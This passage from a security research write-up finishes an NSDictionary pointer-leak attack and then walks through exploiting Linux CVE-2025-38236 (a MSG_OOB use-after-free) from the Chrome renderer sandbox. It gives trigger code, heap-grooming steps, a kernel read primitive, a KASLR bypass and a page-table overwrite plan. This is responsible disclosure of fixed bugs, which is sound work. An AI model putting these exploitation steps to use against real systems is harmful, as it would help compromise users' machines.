To leak even more information about the hash_code, this can be repeated with different hash table sizes. The attack from the last section leaks hash_code % num_buckets, where num_buckets is a prime number that the attacker can pick from the possible sizes __CFBasicHashTableSizes based on how many elements are in each NSDictionary.
A useful math trick here is: Based on the values resulting from calculating hash_code modulo a bunch of different prime numbers, hash_code modulo the product of all those prime numbers can be calculated using the extended Euclidean algorithm. Therefore, based on knowing hash_code % num_buckets for the hash table sizes 23, 41, 71, 127, 191, 251, 383, 631 and 1087, it is possible to determine hash_code modulo 23*41*71*127*191*251*383*631*1087 = 0x5'ce23'017b'3bd5'1495. Because 0x5'ce23'017b'3bd5'1495 is bigger than the biggest value hash_code can have (since hash_code is 64-bit), that will be the actual value of hash_code - the address of the NSNull singleton.
Putting it together
So to leak the address of the NSNull singleton in the shared cache, an attacker has to send serialized data consisting of one large container (such as an NSArray) that, for each prime number of interest, contains two NSDictionary instances with the even-indices and odd-indices patterns. (The NSNull keys should come last in the attacker-provided serialized NSDictionary instances, so my reproducer constructs the serialized data manually as an XML plist, and I then convert it to a binary plist with plutil.)
This attacker-provided serialized data is about 50 KiB in size.
The targeted process then has to deserialize this data, serialize it again, and send it back to the attacker.
Afterwards, the attacker can determine in which buckets NSNull was stored in each NSDictionary, use the bucket indices from pairs of NSDictionary to determine hash_code % num_buckets for each hash table size, and then use the extended Euclidean algorithm to obtain hash_code, the address of the NSNull singleton.
The reproducer
I wrote a reproducer for this issue, consisting of my own victim program that runs on the target machine and attacker programs that provide serialized data to the target machine and receive re-serialized data from the target. (For easy reproduction, you can test this on a single machine, that's also what I did; though I rebooted between "attacker" and "target" to make sure the attacker isn't using the same shared cache address as the target.)
First, on the attacker machine, generate serialized data:
Then, on the attacker machine, process the re-serialized data:
%plutil-convertxml1reencoded.plist
%clang-oextract-pointerextract-pointer.c
%./extract-pointer<reencoded.plist
serializeddatawith1111objects
NSNullclassis12,NSNullobjectis11
NSNulliselem8outof13
NSNulliselem7outof12
NSNulliselem7outof22
NSNulliselem7outof21
NSNulliselem6outof37
NSNulliselem5outof36
NSNulliselem61outof65
NSNulliselem60outof64
NSNulliselem32outof97
NSNulliselem31outof96
NSNulliselem95outof127
NSNulliselem95outof126
NSNulliselem175outof193
NSNulliselem175outof192
NSNulliselem188outof317
NSNulliselem188outof316
NSNulliselem214outof545
NSNulliselem214outof544
NSNullmod23=14
NSNullmod41=13
NSNullmod71=10
NSNullmod127=120
NSNullmod191=62
NSNullmod251=189
NSNullmod383=349
NSNullmod631=375
NSNullmod1087=427
NSNullmod0x000000000000000000000000000003af=
0x0000000000000000000000000000017e
NSNullmod0x00000000000000000000000000010589=
0x000000000000000000000000000059e6
NSNullmod0x0000000000000000000000000081bef7=
0xfffffffffffffffffffffffffff4177a
NSNullmod0x00000000000000000000000060cd7a49=
0x000000000000000000000000078e47f3
NSNullmod0x00000000000000000000005ee976e593=
0x000000000000000000000001eb91ab60
NSNullmod0x000000000000000000008dff48e176ed=
0x000000000000000000000001eb91ab60
NSNullmod0x0000000000000000015e003ca3bc222b=
0x000000000000000000000001eb91ab60
NSNullmod0x0000000000000005ce23017b3bd51495=
0x000000000000000000000001eb91ab60
NSNull=0x1eb91ab60
Conclusion
This is a fairly theoretical attack; but I think it demonstrates that using pointers as object hashes for keyed data structures can lead to pointer leaks if everything lines up right, even without using timing attacks.
My example relies on the victim re-serializing the data; but a timing attack version of this might be possible too, with significantly more requests and sufficiently precise measurements.
In my testcase, NSDictionary made it possible to essentially leak information about the ordering of pointers and hashes of numbers by mixing keys of different types; but it is probably possible to leak some amount of information even from data structures that only use pointer keys without mixing key types, especially when the attacker can guess how far apart heap objects are allocated or such and/or can reference the same objects repeatedly across multiple containers.
The most robust mitigation against this is to avoid using object addresses as lookup keys, or alternatively hash them with a keyed hash function (which should reduce the potential address leak to a pointer equality oracle). However, that could come with negative performance effects - in particular, using an ID stored inside an object instead of the object's address could add a memory load to the critical path of lookups.
In early June, I was reviewing a new Linux kernel feature when I learned about the MSG_OOB feature supported by stream-oriented UNIX domain sockets. I reviewed the implementation of MSG_OOB, and discovered a security bug (CVE-2025-38236) affecting Linux >=6.9. I reported the bug to Linux, and it got fixed. Interestingly, while the MSG_OOB feature is not used by Chrome, it was exposed in the Chrome renderer sandbox. (Since then, sending MSG_OOB messages has been blocked in Chrome renderers in response to this issue.)
The bug is pretty easy to trigger; the following sequence results in UAF:
chardummy;
intsocks[2];
socketpair(AF_UNIX,SOCK_STREAM,0,socks);
send(socks[1],"A",1,MSG_OOB);
recv(socks[0],&dummy,1,MSG_OOB);
send(socks[1],"A",1,MSG_OOB);
recv(socks[0],&dummy,1,MSG_OOB);
send(socks[1],"A",1,MSG_OOB);
recv(socks[0],&dummy,1,0);
recv(socks[0],&dummy,1,MSG_OOB);
I was curious to explore how hard it is to actually exploit such a bug from inside the Chrome Linux Desktop renderer sandbox on an x86-64 Debian Trixie system, escalating privileges directly from native code execution in the renderer to the kernel. Even if the bug is reachable, how hard is it to find useful primitives for heap object reallocation, delay injection, and so on?
The exploit code is posted on our bugtracker; you may want to reference it while following along with this post.
Backstory: The feature
Support for using MSG_OOB with AF_UNIX stream sockets was added in 2021 with commit 314001f0bf92 ("af_unix: Add OOB support", landed in Linux 5.15). With this feature, it is possible to send a single byte of "out-of-band" data that the recipient can read ahead of the rest of the data. The feature is very limited - out-of-band data is always a single byte, and there can only be a single pending byte of out-of-band data at a time. (Sending two out-of-band messages one after another causes the first one to be turned into a normal in-band message.) This feature is used almost nowhere except in Oracle products, as discussed on an email thread from 2024 where removal of the feature was proposed; yet it is enabled by default when AF_UNIX socket support is enabled in the kernel config, and it wasn't even possible to disable MSG_OOB support until commit 5155cbcdbf03 ("af_unix: Add a prompt to CONFIG_AF_UNIX_OOB") landed in December 2024.
Because the Chrome renderer sandbox allows stream-oriented UNIX domain sockets and didn't filter the flags arguments of send()/recv() functions, this esoteric feature was usable inside the sandbox.
When a message (represented by a socket buffer / struct sk_buff, short SKB) is sent between two connected stream-oriented sockets, the message is added to the ->sk_receive_queue of the receiving socket, which is a linked list. An SKB has a length field ->len describing the length of data contained within it (counting both data in the SKB's "head buffer" as well as data indirectly referenced by the SKB in other ways). An SKB also contains some scratch space that can be used by the subsystem currently owning the SKB (char cb[48] in struct sk_buff); UNIX domain sockets access this scratch space with the helper #define UNIXCB(skb) (*(struct unix_skb_parms *)&((skb)->cb)), and one of the things they store in there is a field u32 consumed which stores the number of bytes of the SKB that have already been read from the socket. UNIX domain sockets count the remaining length of an SKB with the helper unix_skb_len(), which returns skb->len - UNIXCB(skb).consumed.
MSG_OOB messages (sent with something like send(sockfd, &message_byte, 1, MSG_OOB), which goes through queue_oob() in the kernel) are also added to the ->sk_receive_queue just like normal messages; but to allow the receiving socket to access the latest out-of-band message ahead of the rest of the queue, the ->oob_skb pointer of the receiving socket is updated to point to this message. When the receiving socket receives an OOB message with something like recv(sockfd, &received_byte, 1, MSG_OOB) (implemented in unix_stream_recv_urg()), the corresponding socket buffer stays on the ->sk_receive_queue, but its consumed field is incremented, causing its remaining length (unix_skb_len()) to become 0, and the ->oob_skb pointer is cleared; the normal receive path will have to deal with this when encountering the remaining-length-0 SKB.
This means that the normal recv() path (unix_stream_read_generic()), which runs when recv() is called without MSG_OOB, must be able to deal with remaining-length-0 SKBs and must take care to clear the ->oob_skb pointer when it deletes an OOB SKB. manage_oob() is supposed to take care of this. Essentially, when the normal receive path obtains an SKB from the ->sk_receive_queue, it calls manage_oob() to take care of all the fixing-up required to deal with the OOB mechanism; manage_oob() will then return the first SKB that contains at least 1 byte of remaining data, and manage_oob() ensures that this SKB is no longer referenced as ->oob_skb. unix_stream_read_generic() can then proceed as if the OOB mechanism didn't exist.
Backstory: The bug, and what led to it
In mid-2024, a userspace API inconsistency was discovered, where recv() could spuriously return 0 (which normally signals end-of-file) when trying to read from a socket with a receive queue that contains a remaining-length-0 SKB left behind by receiving an OOB SKB. The fix for this issue introduced two closely related security issues that can lead to UAF; it was marked as fixing a bug introduced by the original MSG_OOB implementation, but luckily was actually only backported to Linux 6.9.8, so the buggy fix did not land in older LTS kernel branches.
After the buggy fix, manage_oob() looked as follows:
In other words, the issue is that when the receive queue looks like this (shown with the oldest message at the top):
SKB 1: unix_skb_len()=0
SKB 2: unix_skb_len()=1 <--OOB pointer
and a normal recv() happens, then manage_oob() takes the !unix_skb_len(skb) branch, which deletes the SKB with remaining length 0 and skips forward to the following SKB; but it then doesn't go through the skb == u->oob_skb check as it otherwise would, which means it doesn't clear out the ->oob_skb pointer before the SKB is consumed by the normal receive path, creating a dangling pointer that will lead to UAF on a subsequent recv(... MSG_OOB).
This issue was fixed, making the checks for remaining-length-0 SKBs and ->oob_skb in manage_oob() independent:
But a remaining issue is that when this function discovers a remaining-length-0 SKB left behind by recv(..., MSG_OOB), it skips ahead to the next SKB and assumes that it is not also a remaining-length-0 SKB. If this assumption is broken, manage_oob() can return a pointer to the second remaining-length-0 SKB, which is bad because the caller unix_stream_read_generic() does not expect to see remaining-length-0 SKBs:
If MSG_PEEK is not set (which is the only case in which SKBs can actually be freed), skip is always 0, and the while (skip >= unix_skb_len(skb)) loop condition should always be false; but when a remaining-length-0 SKB unexpectedly gets here, the condition turns into 0 >= 0, and the loop skips ahead to the first SKB that does not have remaining length 0. That SKB could be the ->oob_skb; in which case this again bypasses the logic in manage_oob() that is supposed to set ->oob_skb to NULL before the current ->oob_skb can be freed.
So the remaining bug can be triggered by first doing the following twice, creating two remaining-length-0 SKBs in the ->sk_receive_queue:
send(socks[1],"A",1,MSG_OOB);
recv(socks[0],&dummy,1,MSG_OOB);
If another OOB SKB is then sent with send(socks[1], "A", 1, MSG_OOB), the ->sk_receive_queue will look like this:
SKB 1: unix_skb_len()=0
SKB 2: unix_skb_len()=0
SKB 3: unix_skb_len()=1 <--OOB pointer
Now, recv(socks[0], &dummy, 1, 0) will trigger the bug and free SKB 3 while leaving ->oob_skb pointing to it; making it possible for subsequent recv() syscalls with MSG_OOB to use the dangling pointer.
The initial primitive
This bug yields a dangling ->msg_oob pointer. Pretty much the only way to use that dangling pointer is the recv() syscall with MSG_OOB, either with or without MSG_PEEK, which is implemented in unix_stream_recv_urg(). (There are other codepaths that touch it, but they're mostly just pointer comparisons, with the exception of the unix_ioctl() handler for SIOCATMARK, which is blocked in Chrome's seccomp sandbox.)
At a high level, the call to state->recv_actor() (which goes down the call path unix_stream_read_actor -> skb_copy_datagram_msg -> skb_copy_datagram_iter -> __skb_datagram_iter(cb=simple_copy_to_iter)) gives a read primitive: it is trying to copy one byte of data referenced by the oob_skb to userspace, so by replacing the memory pointed to by oob_skb with controlled, repeatedly writable data, it is possible to repeatedly cause copy_to_user(<userspace pointer>, <kernel pointer>, 1) with arbitrary kernel pointers. As long as MSG_PEEK is set, this can be repeated; only when MSG_PEEK is clear, the ->msg_oob pointer is cleared.
The only write primitive this bug yields is the increment UNIXCB(oob_skb).consumed += 1 that happens when MSG_PEEK is not set. In the build I'm looking at, the consumed field that is incremented is located 0x44 bytes into the oob_skb, an object which is effectively allocated with an alignment of 0x100 bytes. This means that, if the write primitive is applied to a 64-bit length value or a pointer, it would have to do an increment at offset 4 relative to the 8-byte aligned overwrite target, and it would effectively increment the 64-bit pointer/length by 4 GiB.
My exploit for this issue
Discarded strategy for using the write primitive: Pointer increment
It would be possible to free the sk_buff and reallocate it as some structure containing a pointer at offset 0x40. The write primitive would effectively increment this pointer by 4 GiB (because it would increment by 1 at an offset 4 bytes into the pointer). But this would fundamentally rely on the machine having significantly more than 4 GiB of RAM, which feels gross and a bit like cheating.
Overall strategy
Since this issue relatively straightforwardly leads to a semi-arbitrary read (subject to usercopy hardening restrictions), but the write primitive is much more gnarly, I decided to go with the general approach of: first get the read primitive working; then use the read primitive to assist in exploiting the write primitive. This way, ideally everything after the read primitive bootstrapping can be made reliable with enough work.
Dealing with per-cpu state
Lots of things in this exploit rely on per-cpu kernel data structures and will fail if a task is migrated between CPUs at the wrong time. In some places in the exploit, I repeatedly check which CPU the exploit is running on with sched_getcpu(), and retry if the CPU number changed; though I was too lazy to do that everywhere perfectly, and this could be done even better by relying more directly on the "restartable sequences" subsystem.
The kernel's rseq subsystem maintains a struct rseq in userspace for each thread, which contains the cpu_id that the thread is currently running on; if rseq is available, glibc will read from the rseq struct.
On x86-64, the vDSO contains a pure-userspace implementation of the getcpu() syscall which relies on either the RDPID instruction or, if that is not available, the LSL instruction to determine the ID of the current CPU without having to perform a syscall. (This is implemented in vdso_read_cpunode() in the kernel sources, which is compiled into the vDSO that is mapped into userspace.)
Setting up the read primitive - mostly boring spraying
On the targeted Debian kernel, struct sk_buff is in the skbuff_head_cache SLUB cache, which normally uses order-1 unmovable pages. I had trouble finding a good reallocation primitive that also uses order-1 pages (though maple_node might have been an option); so I went for reallocation as a pipe page (order-0 unmovable), though that means that the reallocation will go through the buddy allocator and requires the order-0 unmovable list to become empty so that an order-1 page is split up.
This is not very novel, so I will only describe a few interesting aspects of the strategy here - if you want a better understanding of how to free a SLUB page and reallocate it as something else, there are plenty of existing writeups, including one I wrote a while ago (section "Attack stage: Freeing the object's page to the page allocator"), though that one does not discuss the buddy allocator.
To make it more likely for a reallocation of an order-1 page as an order-0 page to succeed, the exploit starts by allocating a large number of order-0 unmovable pages to drain the order-0 and order-1 unmovable freelists. Most ways of allocating large amounts of kernel memory are limited in the sandbox; in particular, the default file descriptor table size soft limit (RLIMIT_NOFILE) is 4096 on Debian (Chrome leaves this limit as-is), and I can neither use setrlimit() to bump that number up (due to seccomp) nor create subprocesses with separate file descriptor tables. (A real exploit might be able to work around this by exploiting several renderer processes, though that seems like a pain.) The one primitive I have for allocating large amounts of unmovable pages are page tables: by creating a gigantic anonymous VMA (read-only to avoid running into Chrome's RLIMIT_DATA restrictions) and then triggering read faults all over this VMA, an unlimited number of page tables can be allocated. I use this to spam around 10% of total RAM with page tables. (To figure out how much RAM the machine has, I'm testing whether mmap() works with different sizes, relying on the OVERCOMMIT_GUESS behavior of __vm_enough_memory(); though that doesn't actually work precisely in the sandbox due to the RLIMIT_DATA limit. A cleaner and less noisy way might be to actually fill up RAM and use mincore() to figure out how large the working set can get before pages get swapped out or discarded.)
Afterwards, I create 41 UNIX domain sockets and use them to spam 256 SKB allocations each; since each SKB uses 0x100 bytes, this allocates a bit over 2.5 MiB of kernel memory. That is enough to later flush a slab page out of both SLUB's per-cpu partial list as well as the page allocator's per-cpu freelist, all the way into the buddy allocator.
Then I set up a SLUB page containing a dangling pointer, try to flush this page all the way into the buddy allocator, and reallocate it as a pipe page by using 256 pipes to each allocate 2 pages (which is the minimum size that a pipe always has, see PIPE_MIN_DEF_BUFFERS). This allocates 25624KiB = 2 MiB worth of order-0 pages.
At this point, I have probably reallocated the SKB as a pipe page; but I don't know in which pipe the SKB is located, or at which offset. To figure that out, I store fake SKBs in the pipe pages that point to different data; then, by triggering the bug with recv(..., MSG_OOB|MSG_PEEK), I can read one byte at the pointed-to location and narrow down where in which pipe the SKB is. I don't know the addresses of any kernel objects yet; but the X86-64 implementation of copy_to_user() is symmetric and also works if you pass a userspace pointer as the source, so I can simply use userspace data pointers in the crafted SKBs for now. (SMAP is not an issue here - SMAP is disabled for all memory accesses in copy_to_user(). On x86-64, copy_to_user() is actually implemented as a wrapper around copy_user_generic(), which is a helper that accepts both kernel and userspace addresses as source and destination.)
Afterwards, I have the ability to call copy_to_user(..., 1) on arbitrary kernel pointers through recv(..., MSG_OOB|MSG_PEEK) using the controlled SKB.
Properties of the read primitive
One really cool aspect of a copy_to_user()-based read primitive on x86-64 is that it doesn't crash even when called on invalid kernel pointers - if the kernel memory access fails, the recv() syscall will simply return an error (-EFAULT).
The main limitation is that usercopy hardening (__check_object_size()) will catch attempts to read from some specific memory ranges:
Ranges that wrap around - not an issue here, only ranges of length 1 can be used anyway.
Addresses <=16 - not an issue here.
The kernel stack of the current process, if some other criteria are met. Not an issue here - even if I want to read from a kernel stack, I'll probably want to read the kernel stack of another thread, which isn't protected.
The kernel .text section - all of .data and such is accessible, just .text is restricted. When targeting a specific kernel build, that's not really relevant.
kmap() mappings - those don't exist on x86-64.
Freed vmalloc allocations, or ranges that straddle the bounds of a vmalloc allocation. Not an issue here.
Ranges in the direct mapping, or in the kernel image address range, that straddle the bounds of a high-order folio. Not an issue here, only ranges of length 1 can be used anyway.
Ranges in the direct mapping, or in the kernel image address range, that are used as SLUB pages in non-kmalloc slab caches, at offsets not allowed by usercopy allowlisting (see __check_heap_object()). This is the most annoying part.
(There might be other ways of using this bug to read memory with different constraints, like by using the frag_iter->len read in __skb_datagram_iter() to influence an offset from which known data is subsequently read, but that seems like a pain to work with.)
Locating the kernel image
To break KASLR of the kernel image at this point, there are lots of options, partially thanks to copy_to_user() not crashing on access to invalid addresses; but one nice option is to read an Interrupt Descriptor Table (IDT) entry through the read-only IDT mapping at the fixed address 0xfffffe0000000000 (CPU_ENTRY_AREA_RO_IDT_VADDR), which yields the address of a kernel interrupt handler.
Using the read primitive to observe allocator state and other things
From here on, my goal is to use the read primitive to assist in exploiting the write primitive; I would like to be able to answer questions like:
What is the mapping between struct page */struct ptdesc */struct slab * and the corresponding region in the direct mapping? (This is easy and just requires reading some global variables out of the .data/.bss sections.)
At which address will the next sk_buff allocation be?
What is the current state of this particular page?
Where are my page tables located, and which physical address does a given virtual address map to?
Because usercopy hardening blocks access to objects in specialized slabs, reading the contents of a struct kmem_cache is not possible, because a kmem_cache is allocated from a specialized slab type which does not allow usercopy. But there are many important pieces of kernel memory that are readable, so it is possible to work around that:
The kernel .data/.bss sections, which contain things like pointers to kmem_cache instances.
The vmemmap region, which contains all instances of struct page/struct folio/struct ptdesc/struct slab (these types all together effectively form a union) which describe the status of each page. These also contain things like a SLUB freelist head pointer; a pointer to the kmem_cache associated with a given SLUB page; or an intrusive linked list element tying together the root page tables of all processes.
Kernel stacks of other threads (located in vmalloc memory).
Per-CPU memory allocations (located in vmalloc memory), which are used in particular for memory allocation fastpaths in SLUB and the page allocator; and also the metadata describing where the per-cpu memory ranges are located.
Page tables.
So to observe the state of the SLUB allocator for a given slab cache, it is possible to first read the corresponding kmem_cache* from the kernel .data/.bss section, then scan through all per-cpu memory for objects that look like a struct kmem_cache_cpu (with a struct slab * and a freelist pointer pointing into the corresponding direct mapping range), and check which kmem_cache the struct slab's kmem_cache* points to to determine whether the kmem_cache_cpu is for the right slab cache. Afterwards, the read primitive can be used to read the slab cache's per-cpu freelist head pointer out of the struct kmem_cache_cpu.
To observe the state of a struct page/struct slab/..., the read primitive can be used to simply read the page's refcount and mapcount (which contains type information). This makes it possible to observe things like "has this page been freed yet or is it still allocated" and "as what type of page has this page been reallocated".
To locate the page table root of the current process, it is similarly not possible to directly go through the mm_struct because that is allocated from a specialized slab type which does not allow usercopy (except in the saved_auxv field). But one way to work around this is to instead walk the global linked list of all root page tables (pgd_list), which stores its elements inside struct ptdesc, and search for a struct ptdesc which has a pt_mm field that points to the mm_struct of the current process. The address of this mm_struct can be obtained from the per-cpu variable cpu_tlbstate.loaded_mm. Afterwards, the page tables can be walked through the read primitive.
Finding a reallocation target: The magic of CONFIG_RANDOMIZE_KSTACK_OFFSET
Having already discarded the "bump a pointer by 4 GiB" and "reallocate as a maple tree node" strategies, I went looking for some other allocation which would place an object such that incrementing the value at address 0x...44 leads to a nice primitive. It would be nice to have something there like an important flags field, or a length specifying the size of a pointer array, or something like that. I spent a lot of time looking at various object types that can be allocated on the kernel heap from inside the Chrome sandbox, but found nothing great.
Eventually, I realized that I had been going down the wrong path. Clearly trying to target a heap object was foolish, because there is something much better: It is possible to reallocate the target page as the topmost page of a kernel stack!
That might initially sound like a silly idea; but Debian's kernel config enables CONFIG_RANDOMIZE_KSTACK_OFFSET=y and CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT=y, causing each syscall invocation to randomly shift the stack pointer down by up to 0x3f0 bytes, with 0x10 bytes granularity. That is supposed to be a security mitigation, but works to my advantage when I already have an arbitrary read: instead of having to find an overwrite target that is at a 0x44-byte distance from the preceding 0x100-byte boundary, I effectively just have to find an overwrite target that is at a 0x4-byte distance from the preceding 0x10-byte boundary, and then keep doing syscalls and checking at what stack depth they execute until I randomly get lucky and the stack lands in the right position.
With that in mind, I went looking for an overwrite target on the stack, strongly inspired by Seth's exploit that overwrote a spilled register containing a length used in copy_from_user. Targeting a normal copy_from_user() directly wouldn't work here - if I incremented the 64-bit length used inside copy_from_user() by 4 GiB, then even if the copy failed midway through due to a userspace fault, copy_from_user() would try to memset() the remaining kernel memory to zero.
I discovered that, on the codepath pipe_write -> copy_page_from_iter -> copy_from_iter, the 64-bit length variable bytes of copy_page_from_iter() is stored in register R14, which is spilled to the stack frame of copy_from_iter(); and this stack spill is in a stack location where I can clobber it.
When userspace calls write() on a pipe, the kernel constructs an iterator (struct iov_iter) that encapsulates the userspace memory range passed to write(). (There are different types of iterators that can encapsulate a single userspace range, a set of userspace ranges, or various types of kernel memory.) Then, pipe_write() (which is called anon_pipe_write() in newer kernels) essentially runs a loop which allocates a new pipe_buffer slot in the pipe, places a new page allocation in this pipe buffer slot, and copies up to a page worth of data (PAGE_SIZE bytes) from the iov_iter to the pipe buffer slot's page using copy_page_from_iter(). copy_page_from_iter() effectively receives two length values: The number of bytes that fit into the caller-provided page (bytes, initially set to PAGE_SIZE here) and the number of bytes available in the struct iov_iter encapsulating the userspace memory range (i->count). The amount of data that will actually be copied is limited by both.
If I manage to increment the spilled register R14 which contains bytes by 4 GiB while copy_from_iter() is busy copying data into the kernel, then after copy_from_iter() returns, copy_page_from_iter() will effectively no longer be bounded by bytes, only by i->count (based on the length userspace passed to write()); so it will do a second iteration, which copies into out-of-bounds memory behind the pipe buffer page. If userspace calls write(fd, buf, 0x3000), and the overwrite happens in the middle of copying bytes 0x1000-0x1fff of the userspace buffer into the second pipe buffer page, then bytes 0x2000-0x2fff will be written out-of-bounds behind the second pipe buffer page, at which point i->count will drop to 0, terminating the operation.
Reallocating a SLUB page as a stack page, with arb-read assistance
So to get the ability to increment-after-free a value in a stack page, I again start by draining the low-order page allocator caches. But this time, the arb-read can be used to determine when an object at the right in-page offset is at the top of the SLUB freelist for the sk_buff slub cache; and the arb-read can also determine whether I managed to allocate an entire slab page worth of objects, with no other objects mixed in. Then, when flushing the page out of the SLUB allocator, the arb-read helps to verify that the page really has been freed (its refcount field should drop to 0); and afterwards, the page is flushed out of the page allocator's per-cpu freelist.
Then, to reallocate the page, I run a loop that first allocates a pipe page, then checks the refcount field of the target page. If the refcount of the target page goes up, I probably found the target page, and can exit the loop; otherwise, I free the pipe page again, reallocate it as a page table to drain the page away, and try again. (Directly allocating as a page table would be cumbersome because page tables have RCU lifetime, so once a page has been allocated as a page table, it is hard to reallocate it. Keeping drained pages in pipe buffers might not work well due to the low file descriptor table size, and each pipe FD pair potentially only being able to reference two pages.)
Once I have reallocated the target page as a pipe buffer, I free it again, then free three more pages (from other helper pipes), and then create a new thread with the clone() syscall. If everything goes well, clone() will allocate four pages for the new kernel stack: First the three other pages I freed last, and then the target page as the last page of the stack. By walking the page tables, I can verify that the target page really got reused as the last page of the target stack.
Remaining prerequisites for using the write primitive
At this point, I have the write primitive set up such that I can trigger it on a specific stack memory location. The write primitive essentially first reads some surrounding (stack) memory (in unix_stream_read_actor() and its callees skb_copy_datagram_msg -> skb_copy_datagram_iter) and expects that memory to have a certain structure before incrementing the value at a specific stack location.
I also know what stack allocation I want to overwrite.
The remaining issues are:
I need to ensure that an OOB copy_from_user() behind a pipe buffer page will overwrite some data that helps in compromising the kernel.
I need to be able to detect at what stack depth pipe_write() is running, and depending on that either try again or proceed to trigger the bug.
The UAF reads preceding the UAF increment need to see the right kind of data to avoid crashing.
copy_from_iter() needs to take enough time to allow me to increment a value in its stack frame.
Selecting an OOB overwrite target
Page tables have several nice properties here:
It is easy for me to cause allocation of as many page tables as I want.
I can easily determine the physical and kernel-virtual addresses of page tables that the kernel has allocated for my process (by walking the page tables with the arb read).
They are order-0 unmovable allocations, just like pipe buffers, so the page allocator will allocate them in the same 2MiB pageblocks.
So I am choosing to use the OOB copy_from_user() to overwrite a page table.
This requires that I can observe where my pipe buffer pages are located; for that, I again use the SLUB per-cpu freelist observing trick, this time on the kmalloc-cg-192 slab cache, to figure out where a newly created pipe's pipe_inode_info is located. From there, I can walk to the pipe's pipe_buffer array, which contains pointers to the pages used by the pipe.
With the ability to observe both where my page tables are located and where pipe buffer pages are allocated, I can essentially alternatingly allocate page tables and pipe buffer pages until I get two that are adjacent.
Detecting pipe_write() stack depth
To run pipe_write() with a write() syscall such that I can reliably determine at which depth the function is running and decide whether to go ahead with the corruption, without having to race, I can prepare a pipe such that it initially only has space for one more pipe_buffer, and then call write() with a length of 0x3000. This will cause pipe_write() to first store 0x1000 bytes in the last free pipe_buffer slot, then wait for space to become available again. From another thread, it is possible to detect when pipe_write() has used the last free pipe_buffer slot by repeatedly calling poll() on the pipe: When poll() stops reporting that the pipe is ready for writing (POLLOUT), pipe_write() must have used up the last free pipe_buffer slot.
At that point, I know that the syscall entry part of the kernel stack is no longer changing. To check whether the syscall is executing at a specific depth, it is enough to check whether the return address for the return from x64_sys_call to do_syscall_64 is at the expected position on the kernel stack using the arb read - it can't be a return address left from a preceding syscall because the same stack location where that return address is stored is always clobbered by a subsequent call to syscall_exit_to_user_mode at the end of a syscall.
If the stack randomization is the correct one, I can then do more setup and resume pipe_write() by using read() to clear pipe buffer entries; otherwise, I will use read() to clear pipe buffer entries, let pipe_write() run to completion, and try again.
Letting the reads in the increment primitive see the right data
The increment primitive happens on this call graph:
A promising aspect here is that this codepath first does all the reads; then it does a linked list walk through attacker-controlled pointers with skb_walk_frags(); and then it does the write. skb_walk_frags() is defined as follows:
So if I run recv(..., MSG_OOB) on the UNIX domain socket while the dangling ->oob_skb pointer points to data I control, and craft that fake SKB such that its skb_shinfo(skb)->frag_list points to another fake SKB with ->len=0 and a ->next pointer pointing back to itself, I can cause the syscall to get stuck in an infinite loop. It will keep looping until I replace the ->next pointer with NULL, at which point it will perform just the UAF increment.
This is great news: instead of needing to ensure that the stack contains the right data for the UAF reads and the overwrite target for the UAF increment at the same time, I can first place controlled data on the stack, and then afterwards separately place the overwrite target on the stack.
To place controlled data on the stack, I initially considered using select() or poll(), since I know that those syscalls copy large-ish amounts of data from userspace onto the stack; however, those have the disadvantage of immediately validating the supplied data, and it would be hard to make them actually stay in the syscall, rather than immediately returning out of the syscall with an error and often clobbering the on-stack data array in the process. Eventually I discovered that sendmsg() on a datagram-oriented UNIX domain socket works great for this: ___sys_sendmsg(), which implements the sendmsg() syscall, will import the destination address pointed to by msg->msg_name into a stack buffer (struct sockaddr_storage address), then call into the protocol-specific ->sendmsg handler - in the case of datagram-oriented UNIX domain sockets, unix_dgram_sendmsg(). This function coarsely validates the structure of the destination address (checking that it specifies the AF_UNIX family and is no larger than struct sockaddr_un), then waits for space to become available in the socket's queue before doing anything else with the destination address. This makes it possible to place 108 bytes of controlled data on a kernel stack, and that data will stay there until the syscall can continue or bail out when space becomes available in the socket queue or the socket is shut down. I actually need a bit more data on the stack, but luckily the struct iovec iovstack[UIO_FASTIOV] is directly in front of the address, and unused elements at the end of the iovstack are guaranteed to be zeroed thanks to CONFIG_INIT_STACK_ALL_ZERO=y, which happens to be exactly what I need.
It would be helpful to be able to reliably wait for the sendmsg() syscall to enter the kernel and copy the destination address onto the kernel stack before inspecting the state of its stack; this is luckily possible by supplying a single-byte "control message" via msg->msg_control and msg->msg_controllen, which will mostly be ignored because it is too small to be a legitimate control message, but will be copied onto the kernel stack in ____sys_sendmsg() after the destination address has been copied onto the stack. It is possible to detect from userspace when this kernel access to msg->msg_control happens by pointing it to a userspace address which is not yet populated with a page table entry, then polling mincore() on this userspace address.
So now my strategy is roughly:
In a loop, call sendmsg() on the thread with the stack the dangling ->oob_skb pointer points to to place a fake SKB on the stack until the fake SKB lands at the right stack offset thanks to CONFIG_RANDOMIZE_KSTACK_OFFSET, and have that fake SKB's skb_shinfo(skb)->frag_list point to a second fake SKB with a ->next pointer that refers back to itself. (This second fake SKB can be placed anywhere I want, so I'm putting it in a userspace-owned page, so that userspace can directly write into it.)
On a second thread, use write() on a UNIX domain socket to use the dangling ->oob_skb pointer, which will start looping endlessly, following the ->next pointer.
On the thread that called sendmsg() before, now call write(..., 0x3000) on a pipe with one free pipe_buffer slot in a loop until the syscall handler lands at the right stack offset thanks to CONFIG_RANDOMIZE_KSTACK_OFFSET.
Let the pipe write() continue, and wait until it is in the middle of copying data from userspace memory to a pipe buffer page.
Set the ->next pointer in the second fake SKB to NULL, so that the write() on the UNIX domain socket stops looping, performs the UAF increment, and returns.
Wait for the pipe write() to finish, at which point the page table behind the pipe data page should have been overwritten with controlled data.
Slowing down copy_from_iter()
I need to slow down a copy_from_iter() call. There are several strategies for this that don't work (or don't work well) in a Chrome renderer sandbox:
userfaultfd: not accessible in the Chrome Desktop renderer sandbox, and nowadays usually anyways nerfed such that only root can use it to intercept usercopy operations
FUSE: not accessible in the Chrome Desktop renderer sandbox
causing lots of major page faults: I'm not sure if there is some indirect way to get a file descriptor to a writable on-disk file; but either way, this seems like it would be a pain from a renderer.
